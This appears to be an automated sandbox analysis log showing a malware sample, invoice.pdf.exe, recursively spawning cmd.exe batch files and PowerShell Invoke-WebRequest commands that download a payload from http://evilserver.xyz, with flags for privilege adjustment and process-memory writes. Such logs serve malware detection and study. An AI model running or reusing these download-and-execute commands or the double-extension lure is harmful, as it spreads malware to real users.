        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E466.tmp\E467.tmp\E468.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        50⤵
        
        PID:1776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        51⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2240
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        51⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1528
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E86C.tmp\E86D.tmp\E86E.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        52⤵
        
        PID:2236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        53⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2936
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        53⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1740
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EBF4.tmp\EC05.tmp\EC06.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        54⤵
        
        PID:2532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        55⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1484
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        55⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:804
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EF10.tmp\EF11.tmp\EF12.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        56⤵
        
        PID:2448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        57⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2284
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        57⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2368
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F4DA.tmp\F4DB.tmp\F4DC.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        58⤵
        
        PID:1700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        59⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1560
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        59⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2228
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F7A8.tmp\F7A9.tmp\F7AA.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        60⤵
        
        PID:2424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        61⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:304
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        61⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2644
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FC88.tmp\FC89.tmp\FC8A.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        62⤵
        
        PID:1592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        63⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1080
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        63⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2164
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AC.tmp\BD.tmp\BE.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        64⤵
        
        PID:2200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        65⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2808
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        65⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:456
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3B8.tmp\3B9.tmp\3BA.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        66⤵
        
        PID:2140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        67⤵
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        67⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1552
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\732.tmp\733.tmp\734.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        68⤵
        
        PID:1580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        69⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        69⤵
        
        PID:1392
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BA4.tmp\BA5.tmp\BA6.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        70⤵
        
        PID:2376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        71⤵
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        71⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2616
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E72.tmp\E83.tmp\E84.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        72⤵
        
        PID:960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        73⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        73⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1020
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\120A.tmp\120B.tmp\120C.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        74⤵
        
        PID:2116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        75⤵
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        75⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2372
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\16FA.tmp\16FB.tmp\16FC.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        76⤵
        
        PID:2016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        77⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:108
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        77⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2272
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1A16.tmp\1A17.tmp\1A18.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        78⤵
        
        PID:2824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        79⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        79⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2156
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1CC4.tmp\1CC5.tmp\1CD6.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        80⤵
        
        PID:928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        81⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1600
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        81⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1480
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\202E.tmp\202F.tmp\2030.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        82⤵
        
        PID:2244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        83⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:608
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        83⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3124
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\233A.tmp\233B.tmp\233C.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        84⤵
        
        PID:3144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        85⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3172
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        85⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3256
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2730.tmp\2731.tmp\2732.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        86⤵
        
        PID:3276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        87⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3304
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        87⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3392
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\29A0.tmp\29A1.tmp\29A2.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        88⤵
        
        PID:3412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        89⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3440
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        89⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3524
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2DC4.tmp\2DC5.tmp\2DC6.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        90⤵
        
        PID:3544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        91⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3572
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        91⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3652
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3360.tmp\3370.tmp\3371.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        92⤵
        
        PID:3672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        93⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3704
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        93⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3792
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\360E.tmp\360F.tmp\3610.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        94⤵
        
        PID:3812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        95⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3840
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        95⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3932
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\38BC.tmp\38BD.tmp\38BE.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        96⤵
        
        PID:3952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        97⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3980
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        97⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:4068
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3D00.tmp\3D01.tmp\3D02.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        98⤵
        
        PID:4088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        99⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3092
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        99⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3208
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3F42.tmp\3F43.tmp\3F44.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        100⤵
        
        PID:3236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        101⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3192
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        101⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3324
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\43B4.tmp\43B5.tmp\43B6.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        102⤵
        
        PID:3348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        103⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3404
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        103⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3532
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\46E0.tmp\46E1.tmp\46E2.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        104⤵
        
        PID:3604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        105⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3584
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        105⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3720
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\49DC.tmp\49DD.tmp\49DE.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        106⤵
        
        PID:3788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        107⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        107⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3900
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\50FD.tmp\50FE.tmp\50FF.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        108⤵
        
        PID:3940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        109⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        109⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3116
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\537D.tmp\537E.tmp\537F.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        110⤵
        
        PID:608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        111⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3204
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        111⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3240
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\584D.tmp\584E.tmp\584F.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        112⤵
        
        PID:3332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        113⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3312
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        113⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3516
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5B3A.tmp\5B3B.tmp\5B3C.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        114⤵
        
        PID:3624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        115⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3736
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        115⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3892
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5FBD.tmp\5FBE.tmp\5FCE.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        116⤵
        
        PID:2976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        117⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        117⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:4004
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\643F.tmp\6440.tmp\6441.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        118⤵
        
        PID:2724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        119⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3996
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        119⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3292
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6799.tmp\679A.tmp\679B.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        120⤵
        
        PID:3376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        121⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3340
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        121⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3452
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6C98.tmp\6C99.tmp\6C9A.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        122⤵
        
        PID:3484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        123⤵
        
        PID:3640
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        123⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3744
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6F27.tmp\6F28.tmp\6F29.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        124⤵
        
        PID:3864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        125⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        125⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3980
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\72C0.tmp\72C1.tmp\72C2.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        126⤵
        
        PID:2092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        127⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3264
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        127⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2680
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\75CC.tmp\75CD.tmp\75CE.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        128⤵
        
        PID:3460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        129⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3492
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        129⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3640
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\78B9.tmp\78BA.tmp\78BB.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        130⤵
        
        PID:3896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
